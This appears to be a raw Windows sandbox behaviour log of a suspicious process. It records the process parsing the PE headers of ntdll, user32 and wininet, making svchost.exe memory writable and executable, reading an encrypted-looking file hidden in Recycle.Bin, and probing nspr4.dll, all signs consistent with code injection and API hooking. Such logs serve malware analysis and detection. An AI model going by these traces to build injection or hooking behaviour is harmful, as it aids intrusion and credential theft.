File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081393508
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081394352
System info queried Type: ProcessorInformation success or wait 2081395479
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2081396714
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BAFF2F8 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2081397021
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2081397372
System info queried Type: ProcessorInformation success or wait 2081397958
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081398364
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081399218
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2081399483
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081399874
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2081400132
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2081400443
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081401046
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2081401305
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081401832
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081402170
System info queried Type: ProcessorInformation success or wait 2081403283
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2081404617
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BAFCF58 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2081404923
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2081405360
System info queried Type: ProcessorInformation success or wait 2081405944
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081406347
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081407201
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2081407511
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081407904
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2081408165
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2081408474
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081409078
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2081409339
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2081409867
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081410204
System info queried Type: ProcessorInformation success or wait 2081411312
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2081412542
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BB10168 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2081412848
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2081413839
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2081416087
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2081417188
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2081431663
System info queried Type: ProcessorInformation success or wait 2081432294
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081432711
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2081433584
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 4 Value: D8 00 00 00 success or wait 2081433860
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2081434486
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 20 Value: 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2081434758
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 2081435080
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2081435696
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 2081435970
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2081436510
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: E30000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2081436861
System info queried Type: ProcessorInformation success or wait 2081438056
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2081439272
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: BAFC210 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2081439726
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2081440129
System info queried Type: ProcessorInformation success or wait 2081440718
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081441049
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081441916
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081442185
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081442804
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081443069
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081443386
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081443998
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081444264
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081444801
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081445145
System info queried Type: ProcessorInformation success or wait 2081446272
System info queried Type: ProcessorInformation success or wait 2081449149
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081449487
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081451207
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081451477
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081451878
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081452146
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081452460
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081453074
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081453341
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081453878
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081454223
System info queried Type: ProcessorInformation success or wait 2081455439
System info queried Type: ProcessorInformation success or wait 2081458412
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081458829
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081459690
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081459959
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081460358
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081460670
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081460984
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081461597
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081461864
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081462403
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081462747
System info queried Type: ProcessorInformation success or wait 2081463875
System info queried Type: ProcessorInformation success or wait 2081467181
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081467597
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081468456
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081468725
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081469124
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081469391
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081469705
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081470318
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081470585
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081471168
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081471512
System info queried Type: ProcessorInformation success or wait 2081472636
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2081475604
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2081476901
System info queried Type: ProcessorInformation success or wait 2081489500
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081489916
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081490781
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081491096
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081491496
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081491762
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081492077
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081492689
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081492956
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081493491
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081493910
System info queried Type: ProcessorInformation success or wait 2081495048
System info queried Type: ProcessorInformation success or wait 2081498072
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081498490
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081499351
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081499620
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081500020
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081500286
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081500601
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081501257
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081501524
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081502060
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081502401
System info queried Type: ProcessorInformation success or wait 2081503528
System info queried Type: ProcessorInformation success or wait 2081506957
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081507377
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081508242
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081508510
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081508908
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081509173
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081509488
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081510099
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081510365
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081510899
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081511340
System info queried Type: ProcessorInformation success or wait 2081512438
System info queried Type: ProcessorInformation success or wait 2081515379
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081515794
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081516653
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081516923
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081517321
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081517586
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081517901
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081518513
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081518778
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081519312
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081519654
System info queried Type: ProcessorInformation success or wait 2081520780
System info queried Type: ProcessorInformation success or wait 2081523774
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081524188
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081525043
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081525312
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081525709
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081525976
